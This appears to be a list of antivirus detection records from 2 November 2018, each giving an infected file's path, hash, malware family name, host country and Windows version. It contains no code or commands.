  Row(detection=Row(filename='taskhost.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\Adobe\\taskhost.exe', filesize=768000, name='HEUR/AGEN.1000279.#M1.#R1'), hash='37a43fb439032768879b0aef3003edc11371363dc77d6a3670766387fc235272', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:30:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fil04929.exe', filepath='f:\\pc-amilo-mada\\sp-2\\reiner\\plate-pc-altxp\\plate-fund\\exe\\FIL04929.EXE', filesize=128000, name='Adware/Altnet.6a2143.#M1.#R1'), hash='6a2143b7878556fd366b3aab43f1c1986cb34188194b09d3c8dbe7b1a1306ecb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:52:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-05-51-21.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T02:19:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-114736-bc9594d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a16627ca\\AVSCAN-20181102-114624-AF9AF7BC\\AVSCAN-20181102-114736-BC9594D4', filesize=768000, name='SPR/Agent.37a43f.#M1.#R1'), hash='37a43fb439032768879b0aef3003edc11371363dc77d6a3670766387fc235272', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182934-db90fb2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a82e24d\\AVSCAN-20181102-182005-75E689BF\\AVSCAN-20181102-182934-DB90FB2D', filesize=960000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='5a436798dbe7503e99e0db771b57e5f33da119ee6b3f5ebe8d3f37aa3c8e7ec5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:29:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage2_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE2_SE\\STAGE2_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='30juni14.bat', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\30juni14\\30juni14.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:26:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mip.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='12d13fd81d7189d4b7b60deb51a90d6f40181f582a2c15ae9ed5d168259496a4', metadata=Row(cmdline='C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\shell32.dll,OpenAs_RunDLL E:\\\\\\\\Program Files\\\\\\\\Eidos Interactive\\\\\\\\Hitman 2 Silent Assassin\\\\\\\\hitman2.exe.SAVEfiles', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T11:59:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155951-ec4f8583', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155951-EC4F8583', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T17:47:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211707-212bf010', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e83dc89\\AVSCAN-20181102-211655-1FCF5230\\AVSCAN-20181102-211707-212BF010', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pinball.exe', filepath='C:\\Program Files\\Windows NT\\Pinball\\pinball.exe', filesize=320000, name='W32/Alman.BB.#M1.#R1'), hash='2ebba022d9540b4b9953c96a4eebb05686478b341cf72752c4520a1d0f996e52', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:52:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\OUTLANDER 2011\\11OUTLANDER PWRE1012R JUN 2010\\SERVICE\\DATA\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='25575af433ceab482a458fce057f04314fef232568a9d10b82c8c395c28a2710', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asal2.exe', filepath='H:\\Lab\\asal2.exe', filesize=5120000, name='W32/Infector.Gen.#M300.#R7863'), hash='3446e4d17f89d73b3c25c7e8560259889ee4f7db15df9fb8dc8efd2a5ae04286', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-02T03:37:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aam registration notifier.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\P7\\AAM Registration Notifier.exe', filesize=444000, name='W32/Neshta.A.#M1.#R1'), hash='47c2a29f3f9e7e7733bee9a945bf13239d8f2e528a85476c7cd44219a983c72a', metadata=Row(cmdline='\\\\\\/c', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=194640, timestamp='2018-11-02T03:41:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu(1).html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Aspek dan Implikasi Hukum dalam Pendaftaran Tanah dan Penertiban Sertifikat Hak-Hak atas Tanah - hukumonline.com_files\\lY4eZXm_YWu(1).html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='1d5d761e685142f38b514b6c503d1f1f009175527a23545a9ed92aefb778aa8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:12:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0119624.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0119624.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4a75918c7fd1f0ea3ba3a28aaa03900c86d9db3007ec8756ab3be3d27e0ebb1f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4A75918C7FD1F0EA3BA3A28AAA03900C86D9DB3007EC8756AB3BE3D27E0EBB1F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4a75918c7fd1f0ea3ba3a28aaa03900c86d9db3007ec8756ab3be3d27e0ebb1f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:46:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061217-3851d354', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061217-3851D354', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winlogon.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\winlogon.exe', filesize=576000, name='W32/Sality.AT.#M1.#R1'), hash='66c1996281ae46ee73055c0ee81be238551ce6b634f2f6dec75d0adb0abc0764', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:12:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054623-99da12df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054623-99DA12DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054615-952298cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054615-952298CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215028-a967ecfa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_550a0436\\AVSCAN-20181102-214226-6C95EE96\\AVSCAN-20181102-215028-A967ECFA', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:50:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054220-09025d18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054220-09025D18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='krvtsbkq.exe', filepath='\\\\?\\F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\krVTsbKq.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-093347-020faddd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0888d111\\AVSCAN-20181102-093239-F569A9CF\\AVSCAN-20181102-093347-020FADDD', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00000891', filepath='C:\\Windows\\Temp\\tmp00000098\\tmp00000891', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T19:44:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylivehandler.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe.vir', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:27:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rqspjdmg.exe', filepath='\\\\?\\F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\rQspJdmG.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001f96', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001f96', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:50:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100416-91ebb306', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-100416-91EBB306', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='6529d7055985765a1451f1add7710218f7be72d22ed68295d9c18754d09f5227', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:06:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060402-10ff6e32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060402-10FF6E32', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='5e20f5005149504ccf0d67aae24c5425111b24fa39eebc422f44c2f2043b7a46', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\5E20F5005149504CCF0D67AAE24C5425111B24FA39EEBC422F44C2F2043B7A46', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5e20f5005149504ccf0d67aae24c5425111b24fa39eebc422f44c2f2043b7a46', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:19:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051533-4b63099f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051533-4B63099F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:32Z'), dt=datetime.date(2018, 11, 2)),
